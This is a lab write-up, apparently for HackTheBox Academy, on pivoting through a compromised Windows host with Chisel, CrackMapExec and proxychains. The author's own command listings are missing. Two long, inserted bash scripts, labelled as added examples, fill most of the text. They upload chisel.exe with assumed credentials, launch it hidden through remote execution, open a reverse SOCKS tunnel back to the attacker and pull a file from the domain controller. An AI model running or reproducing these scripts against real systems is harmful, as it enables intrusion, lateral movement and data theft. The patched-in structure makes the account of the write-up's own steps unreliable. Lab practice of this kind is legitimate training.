Proxychains with CME
Whenever we need to pivot inside a network, we can run CrackMapExec through proxychains. HackTheBox Academy showed us how to pivot using Chisel.
The following scenario is proposed:
Our attacker machine has the IP 10.10.15.126. We compromised the machine 10.129.204.178, which has a second interface on the network 172.16.1.0/24. We confirmed this by executing the Windows ipconfig command on the compromised machine.
Our objective is to read a file on the 172.16.1.10 asset. To do that, we need to pivot through our compromised host.
Windows as client and Linux as server
The first scenario implements a reverse SOCKS proxy: the Chisel server runs on our attacker machine and the compromised host connects back to it as a client, which opens the SOCKS listener on the attacker side.
We first need to get the Chisel binary onto both our attacker machine and the compromised host, choosing the right Chisel build for each machine's OS and architecture.
We first started the Chisel server on our attacker machine.
As seen below, we used CME to download the Chisel binary for Windows onto the compromised host. As we are running CME inside a container, we had to share a folder between the isolated Docker environment and our host machine to transfer the Chisel binary. To do that, I created a shared volume by passing the -v /home/amandine/:/tmp flag to the docker run command. This means that the content of the /home/amandine folder on my host machine is shared with the /tmp folder in the Docker environment.
The complete docker run command to start the container is as follows:
Then, using CME, I executed the command that makes the Chisel client on the compromised host connect back to my Chisel server.
This created the tunnel between my attacker machine and the compromised host. The compromised host will be used to forward traffic from my attacker machine into the 172.16.1.0/24 network.
I now have to configure proxychains in the Docker environment. Since I used the --network host flag when starting the Docker container, my host network is shared with the Docker environment, so the SOCKS port that Chisel opened on my host is reachable from inside the container.
I installed proxychains in the Docker environment using apt and added the following entry to the /etc/proxychains.conf file in my Docker environment.
Now that my tunnel is set up and proxychains is configured in the Docker environment, I can use proxychains to list the files in the flag shared folder.
As seen below, I could download the theflag.txt file located on the DC01 machine through proxychains.
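The whole first scenario as one script, added here as an example; these are not the write-up's or HackTheBox's commands. The IP addresses are the ones above; the Chisel server port (8000), the drop path C:\Windows\Temp, the credentials, the share name (flag), the Docker image and entrypoint, and the Start-Process detach trick are all assumptions. Run it with `./pivot.sh run`; without the argument it only defines the functions, so it can be sourced.

```bash
#!/usr/bin/env bash
# Added example, not the write-up's own commands: reverse SOCKS pivot with
# Chisel + CrackMapExec + proxychains. IPs are the write-up's; the chisel port,
# file paths, credentials, share name, Docker image and entrypoint are assumed.
set -u

ATTACKER_IP=10.10.15.126            # attacker box: runs the chisel server
PIVOT_IP=10.129.204.178             # compromised dual-homed Windows host
TARGET_IP=172.16.1.10               # DC01, only reachable via 172.16.1.0/24
CHISEL_PORT=${CHISEL_PORT:-8000}    # assumed: listener port of the chisel server
SOCKS_PORT=1080                     # chisel's default port for the R:socks remote
USER_=${CME_USER:-administrator}    # assumed credentials for the pivot and DC01
PASS_=${CME_PASS:-Password123}
SHARE=${CME_SHARE:-flag}            # assumed: share on DC01 holding theflag.txt
HOST_DIR=/home/amandine             # host folder mounted at /tmp in the container

# 0) CME container with host networking (so 127.0.0.1:1080 on the host is reachable
#    from inside) and the shared volume; image name and entrypoint are assumptions.
start_container() {
  docker run -it --rm --network host -v "$HOST_DIR:/tmp" \
    --entrypoint /bin/sh byt3bl33d3r/crackmapexec
}

# 1) Attacker side: chisel server that accepts reverse remotes from its clients.
chisel_server_cmd() { printf 'chisel server -p %s --reverse\n' "$CHISEL_PORT"; }

# 2) Pivot side: connect back; R:socks opens the SOCKS5 listener on the SERVER
#    (attacker) machine, 127.0.0.1:1080 by default.
chisel_client_cmd() {
  printf 'C:\\Windows\\Temp\\chisel.exe client %s:%s R:socks\n' "$ATTACKER_IP" "$CHISEL_PORT"
}

# 3) Upload chisel.exe (visible at /tmp in the container thanks to -v) and start it.
#    --put-file paths are relative to the C$ share. Start-Process detaches chisel so
#    the exec method returns instead of waiting on a client that never exits
#    (assumed workaround, not from the write-up).
deploy_client() {
  cme smb "$PIVOT_IP" -u "$USER_" -p "$PASS_" \
    --put-file /tmp/chisel.exe '\Windows\Temp\chisel.exe'
  cme smb "$PIVOT_IP" -u "$USER_" -p "$PASS_" \
    -X "Start-Process -FilePath C:\\Windows\\Temp\\chisel.exe -ArgumentList 'client $ATTACKER_IP:$CHISEL_PORT R:socks' -WindowStyle Hidden"
}

# 4) proxychains configuration pointing at the reverse SOCKS port.
proxychains_conf() {
  cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $SOCKS_PORT
EOF
}
write_proxychains_conf() { proxychains_conf > "${1:-/etc/proxychains.conf}"; }

# 5) Check that the tunnel is really up before blaming proxychains: returns 0 when
#    something accepts TCP connections on host:port (bash /dev/tcp, 3 s timeout).
socks_ready() {
  local host=${1:-127.0.0.1} port=${2:-$SOCKS_PORT}
  timeout 3 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# 6) Through the tunnel: list the share on DC01, then pull theflag.txt.
fetch_flag() {
  proxychains cme smb "$TARGET_IP" -u "$USER_" -p "$PASS_" --spider "$SHARE" --pattern txt
  proxychains cme smb "$TARGET_IP" -u "$USER_" -p "$PASS_" --share "$SHARE" \
    --get-file theflag.txt /tmp/theflag.txt
}

# ./pivot.sh run  -> full sequence (the chisel server must already be running on
# the attacker box in another terminal, see chisel_server_cmd). No argument ->
# only define the functions, e.g. for sourcing.
if [ "${1:-}" = run ]; then
  echo "attacker side, other terminal: $(chisel_server_cmd)"
  write_proxychains_conf
  deploy_client
  until socks_ready; do echo 'waiting for the reverse tunnel...'; sleep 2; done
  fetch_flag
fi
```

The `socks_ready` check is the one step worth keeping even if you type the rest by hand: when `proxychains cme` hangs, the first question is whether 127.0.0.1:1080 is listening at all on the attacker host, and that answers it without touching the target.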
Linux as client and Windows as server
Hack The Box also proposed exploring a simple forward proxy, where our attacker machine plays the client and the compromised Windows host acts as the server.
Starting the proxy server on the compromised host using CrackMapExec:
Connecting the Chisel client from my attacker host:
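The forward variant as an added example, again not the write-up's own commands: the compromised host runs `chisel.exe server --socks5` and our box connects to it with a plain `socks` remote. The IPs are the write-up's; the port (8000), the drop path, the credentials and the Start-Process detach are assumptions. The proxychains entry is the same as in the reverse setup, because the SOCKS listener still ends up on 127.0.0.1:1080 on the attacker side.

```bash
#!/usr/bin/env bash
# Added example, not the write-up's own commands: forward variant, where the
# compromised Windows host runs the chisel server and our box is the client.
# IPs are the write-up's; the port, paths and credentials are assumptions.
set -u

PIVOT_IP=10.129.204.178             # compromised host: now runs chisel.exe server
CHISEL_PORT=${CHISEL_PORT:-8000}    # assumed: port chisel.exe listens on
SOCKS_PORT=1080                     # default port of the plain "socks" remote
USER_=${CME_USER:-administrator}    # assumed credentials for the pivot
PASS_=${CME_PASS:-Password123}

# Server side (pivot): --socks5 turns on chisel's built-in SOCKS5 proxy. Launched
# via CME and detached with Start-Process so the exec method returns (assumed
# workaround, not from the write-up).
chisel_server_cmd() {
  printf 'C:\\Windows\\Temp\\chisel.exe server -p %s --socks5\n' "$CHISEL_PORT"
}
start_server_on_pivot() {
  cme smb "$PIVOT_IP" -u "$USER_" -p "$PASS_" \
    -X "Start-Process -FilePath C:\\Windows\\Temp\\chisel.exe -ArgumentList 'server -p $CHISEL_PORT --socks5' -WindowStyle Hidden"
}

# Client side (attacker): a plain "socks" remote opens the SOCKS5 listener locally
# on 127.0.0.1:1080, so the proxychains.conf entry of the reverse setup is unchanged.
chisel_client_cmd() { printf 'chisel client %s:%s socks\n' "$PIVOT_IP" "$CHISEL_PORT"; }

# What changes operationally: the tunnel is now an INBOUND connection to the pivot,
# so CHISEL_PORT must be allowed by the Windows firewall and any ACL in between.
# Returns 0 when host:port accepts a TCP connection; check this before blaming chisel.
port_open() {
  local host=$1 port=$2
  timeout 3 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# ./forward.sh run -> start the server on the pivot, wait for its port, connect.
if [ "${1:-}" = run ]; then
  start_server_on_pivot
  until port_open "$PIVOT_IP" "$CHISEL_PORT"; do echo 'waiting for chisel.exe server...'; sleep 2; done
  chisel client "$PIVOT_IP:$CHISEL_PORT" socks &   # keep the client in the background
  echo "SOCKS5 on 127.0.0.1:$SOCKS_PORT; run: proxychains cme smb 172.16.1.10 ..."
fi
```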